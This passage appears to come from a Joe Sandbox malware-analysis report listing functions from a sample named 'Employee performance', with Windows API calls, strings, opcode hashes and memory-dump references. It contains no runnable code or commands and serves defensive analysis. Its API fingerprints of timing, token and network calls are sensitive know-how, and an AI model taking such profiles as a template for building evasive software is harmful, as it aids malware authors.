Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: ef8e0da91d251df6f23858816c915ff6b85feb52f80e0ed0891d40e6f890dc8b
Instruction ID: 0212238a74dfb384039edda2038276521e27d1217e519422e544c5653c7de2ec
Opcode Fuzzy Hash: ef8e0da91d251df6f23858816c915ff6b85feb52f80e0ed0891d40e6f890dc8b
Instruction Fuzzy Hash: 061139B5201305ABF7308F54E909B967FFCEB80B04F008569E6D6D6591DBB5F904CB60

Function 0103B0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0103ACD3,?,00008000), ref: 0103B0C4
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0103ACD3,?,00008000), ref: 0103B0E9
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0103ACD3,?,00008000), ref: 0103B0F3
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0103ACD3,?,00008000), ref: 0103B126

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: 8995cecf3009846d7072edaa1229e14c2e66dc9bb995bde139c6a213c365fe7b
Instruction ID: 467cd6aa10ea720184009e5258125deb376e716b58d474027140f61de15511d8
Opcode Fuzzy Hash: 8995cecf3009846d7072edaa1229e14c2e66dc9bb995bde139c6a213c365fe7b
Instruction Fuzzy Hash: 61115B31C0151CEBDF10AFE4E9586EEBF78FF8A715F404486E9C1B6289CB3596508B61

Function 01032DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 01032DC5
GetWindowThreadProcessId.USER32(?,00000000), ref: 01032DD6
GetCurrentThreadId.KERNEL32 ref: 01032DDD
AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 01032DE4

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 4e803fa2c80d57d1e98ac941e7935ead9eb480db8d395605be86cbeb3e93188b
Instruction ID: 73a3f9d7e55b3ca333c793ac5c179e1f23d3b46b35a4ca7c7c049a0643354749
Opcode Fuzzy Hash: 4e803fa2c80d57d1e98ac941e7935ead9eb480db8d395605be86cbeb3e93188b
Instruction Fuzzy Hash: 94E09271101224BBEB302A779D0DFEB7E6CEF87BA1F000015F286D50809AAAD840C7B0

Function 01068863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00FE9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00FE9693
Part of subcall function 00FE9639: SelectObject.GDI32(?,00000000), ref: 00FE96A2
Part of subcall function 00FE9639: BeginPath.GDI32(?), ref: 00FE96B9
Part of subcall function 00FE9639: SelectObject.GDI32(?,00000000), ref: 00FE96E2

MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 01068887
LineTo.GDI32(?,?,?), ref: 01068894
EndPath.GDI32(?), ref: 010688A4
StrokePath.GDI32(?), ref: 010688B2

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 624d001936c75fd6432ef09585851636bb0b1f4b15db1a70d3414069e2ed98e0
Instruction ID: afa714b8b61f41487ab1438ade8b441dc46d5a65529f194cc3af9a0338dd5221
Opcode Fuzzy Hash: 624d001936c75fd6432ef09585851636bb0b1f4b15db1a70d3414069e2ed98e0
Instruction Fuzzy Hash: FFF05E36045658BAFB226F94AD09FCE3F59AF0A310F048141FB91650E5C7BA5111DFE5

Function 00FE98B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00FE98CC
SetTextColor.GDI32(?,?), ref: 00FE98D6
SetBkMode.GDI32(?,00000001), ref: 00FE98E9
GetStockObject.GDI32(00000005), ref: 00FE98F1

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Color$ModeObjectStockText
String ID:
API String ID: 4037423528-0
Opcode ID: 00dc67af47df2739dac67dd16e9e846b12252bd8f6190130e43636cd3f1cfb20
Instruction ID: 9943d16f2669282915d9612fd7bed22a14c767e25f56e9ff0695d372c09ddf67
Opcode Fuzzy Hash: 00dc67af47df2739dac67dd16e9e846b12252bd8f6190130e43636cd3f1cfb20
Instruction Fuzzy Hash: 04E06531240290EAEB315B78A909BD93F51AB12335F048219F7F9580E5C77642509B11

Function 0103162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 01031634
OpenThreadToken.ADVAPI32(00000000,?,?,?,010311D9), ref: 0103163B
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,010311D9), ref: 01031648
OpenProcessToken.ADVAPI32(00000000,?,?,?,010311D9), ref: 0103164F

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 5586e8680e62b7f0ebd2fe20684182123df68f207e14b365f99426f8821e0d0a
Instruction ID: da2455be6d07dc350c0c2c2e587d3dd813e457deaf1aed9641165ca931cf25da
Opcode Fuzzy Hash: 5586e8680e62b7f0ebd2fe20684182123df68f207e14b365f99426f8821e0d0a
Instruction Fuzzy Hash: A4E08631601212ABF7701FE59F0DB463BBDAF4A791F144848F6C9C9084D6394040C750

Function 0102D858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0102D858
GetDC.USER32(00000000), ref: 0102D862
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0102D882
ReleaseDC.USER32(?), ref: 0102D8A3

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: e09aacb0591fe5c21f3df0a0e9b67986005027c5143bb746e9d47c1380f1e0df
Instruction ID: 82e621c1f67db4925bd5d37905fc53f8de943361c5b018c5cef618780a00e694
Opcode Fuzzy Hash: e09aacb0591fe5c21f3df0a0e9b67986005027c5143bb746e9d47c1380f1e0df
Instruction Fuzzy Hash: FDE01AB5800245DFEB519FA0D60866DBBB6FB08310F14900AF8CAE7254C77E6901AF54

Function 0102D86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0102D86C
GetDC.USER32(00000000), ref: 0102D876
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0102D882
ReleaseDC.USER32(?), ref: 0102D8A3

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: a37d669390a12fe71b903b72c28958e68a3e2b7aa89dce8d1f4c235c03465389
Instruction ID: fcae2cda5d225899da9f5f48fe35a92f983c68ca7d5c7e5a86667d96b07b3a47
Opcode Fuzzy Hash: a37d669390a12fe71b903b72c28958e68a3e2b7aa89dce8d1f4c235c03465389
Instruction Fuzzy Hash: E7E01A71800240DFDB609FA0D50866DBBB5FB08310B149009F98AE7254C73E6901AF54

Function 01044D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON

Download Yara Rule

APIs

Part of subcall function 00FD7620: _wcslen.LIBCMT ref: 00FD7625

WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 01044ED4

Strings

*, xrefs: 01044E10
LPT, xrefs: 01044DFB

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Connection_wcslen
String ID: *$LPT
API String ID: 1725874428-3443410124
Opcode ID: bdd71c48a7d8e2a71e5fc45ce0d84052d35bec0923b95a9bd94d90cfa3a45069
Instruction ID: 5616581edc966602fbcdb0566b640a3b3d5c3ea00f8f5e3a776f83ca54799d88
Opcode Fuzzy Hash: bdd71c48a7d8e2a71e5fc45ce0d84052d35bec0923b95a9bd94d90cfa3a45069
Instruction Fuzzy Hash: D3916FB5A042049FDB15DF58C8C4FAABBF1AF44304F1980A9E84A9F362D735ED85CB91

Function 00FFE27D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00FFE30D

Strings

pow, xrefs: 00FFE2E5, 00FFE302

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: b3fdecc7554f1b31e655849d335909f8f2fe2003bee11e0426d719eab86f8815
Instruction ID: eb123f7609eb0937f82f34d43529614e7c0b57355d1c84be3f1fc66907d158a2
Opcode Fuzzy Hash: b3fdecc7554f1b31e655849d335909f8f2fe2003bee11e0426d719eab86f8815
Instruction Fuzzy Hash: C8518E72E0920A96EB277718C9043B93FE4EF50750F204969E1D5422FCEF3D9C95AB46

Function 00FEE187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

#, xrefs: 00FEE1B1

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 7d52239c26b51028eda69f9041a7b39a50a4795a27a14a204b34d9077f02536d
Instruction ID: d25bc105b9278c3d7049c8d9f6432819f368e46d3b3e3cb50a9023e9f0f7e81d
Opcode Fuzzy Hash: 7d52239c26b51028eda69f9041a7b39a50a4795a27a14a204b34d9077f02536d
Instruction Fuzzy Hash: B4517235A44296DFEF15DF68D4806BA7BA4FF05310F248096E9C19B2D0D6389D42DBA0

Function 00FEF291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00FEF2A2
GlobalMemoryStatusEx.KERNEL32(?), ref: 00FEF2BB

Strings

@, xrefs: 00FEF2AF

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 55ff205b0327e81eeb9f2759d8a15bdfbbc92a99b8a981007837a50dfd7b8c4c
Instruction ID: dd2bc054cc419711d43e58a4233070ef7b66e973f004918e62405a23248236ab
Opcode Fuzzy Hash: 55ff205b0327e81eeb9f2759d8a15bdfbbc92a99b8a981007837a50dfd7b8c4c
Instruction Fuzzy Hash: B95156714087459BD320AF10DC86BAFBBF9FF84300F85884EF1D981295EB75852ACB66

Function 01055745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 010557E0
_wcslen.LIBCMT ref: 010557EC

Strings

CALLARGARRAY, xrefs: 010557E6, 010557EB

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: BuffCharUpper_wcslen
String ID: CALLARGARRAY
API String ID: 157775604-1150593374
Opcode ID: dbf78587eaf8384c96c8c6b269da3cd7077539c84c75c6182d95d8562d618bbb
Instruction ID: 26722876cb509e44a396774d8830954ad972a3c059852dd96f34638e970614a6
Opcode Fuzzy Hash: dbf78587eaf8384c96c8c6b269da3cd7077539c84c75c6182d95d8562d618bbb
Instruction Fuzzy Hash: EA41A131E002099FCB54DFA9CC819BEBBF5FF49320F14406AE985A7292E7759981CB90

Function 0104D0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0104D130
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 0104D13A

Strings

|, xrefs: 0104D10B

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: CrackInternet_wcslen
String ID: |
API String ID: 596671847-2343686810
Opcode ID: 82a7db0aaadb44f7bf56f1df010e16dc1288722efea76e5bc71e7bd05a85fa4b
Instruction ID: 63ddcb89436e35d4cd006622d9d38de9aa026b7b7917e9bbf19840a8647b79f3
Opcode Fuzzy Hash: 82a7db0aaadb44f7bf56f1df010e16dc1288722efea76e5bc71e7bd05a85fa4b
Instruction Fuzzy Hash: F3313D75D00209ABDF15EFE4CC85AEE7FBAFF14300F04006AF915A6266D735AA06DB54

Function 0106356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 01063621
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0106365C

Strings

static, xrefs: 010635BC

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: f18c917200093b41fa18a12b9e0841f4df99aeca2f607e5c35f0710c4156794b
Instruction ID: f8814a7a18f730f6ea171e9ce2e29c0aca3109a143ca081fbb2564e117f9cdfa
Opcode Fuzzy Hash: f18c917200093b41fa18a12b9e0841f4df99aeca2f607e5c35f0710c4156794b
Instruction Fuzzy Hash: 18318171100604AAEB109F68DC40EFB73ADFF48714F00961AF9A997250DA35AC81D7A0

Function 01064537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 0106461F
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 01064634

Strings

', xrefs: 0106458E

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: d68ee2e9c29d2845298a16d990c57516a536e9b525fbfe8e841a3e7e9281ef5d
Instruction ID: e0801c4a699bed0bf6624d972cfb488d1e9cc74d273aff77eb4c9c67b17ebd72
Opcode Fuzzy Hash: d68ee2e9c29d2845298a16d990c57516a536e9b525fbfe8e841a3e7e9281ef5d
Instruction Fuzzy Hash: AE310674A0120AAFDB54CFA9C980ADA7BF9FF49300F14416AEA45EB342D771A941CF90

Function 010631EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0106327C
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 01063287

Strings

Combobox, xrefs: 01063249

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 792b8c2859d4946412726cc17ad111b7b184f683a9b3a870daf96d84c0ea11d3
Instruction ID: c579cb1e9c2e4b4684cf6e0e0ec6211581c5fd9d8587df9fa0ec8ba587ec35c2
Opcode Fuzzy Hash: 792b8c2859d4946412726cc17ad111b7b184f683a9b3a870daf96d84c0ea11d3
Instruction Fuzzy Hash: 1C11E67130020A7FFF629E58DC80EBB379EFB48364F104125F5989B291D6759C50C7A0

Function 01063710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00FD600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00FD604C
Part of subcall function 00FD600E: GetStockObject.GDI32(00000011), ref: 00FD6060
Part of subcall function 00FD600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00FD606A

GetWindowRect.USER32(00000000,?), ref: 0106377A
GetSysColor.USER32(00000012), ref: 01063794

Strings

static, xrefs: 01063757

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 57e4ab82a242456c184536177663147bec98f75e4771488733c5a753d8b9d6d0
Instruction ID: ab0ddae9897c3ee72879365b7664d3abaf26280e48eaf7056af3340001df826b
Opcode Fuzzy Hash: 57e4ab82a242456c184536177663147bec98f75e4771488733c5a753d8b9d6d0
Instruction Fuzzy Hash: 70113A72610209AFEF11DFA8CD45EEE7BF8FB08354F004515F995E6250D779E8509B90

Function 0104CD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0104CD7D
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0104CDA6

Strings

<local>, xrefs: 0104CD66

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: c5aa6b000b87ce6d376617803f54bc63139999bdfb93ff4b1f6c0dfd803b240c
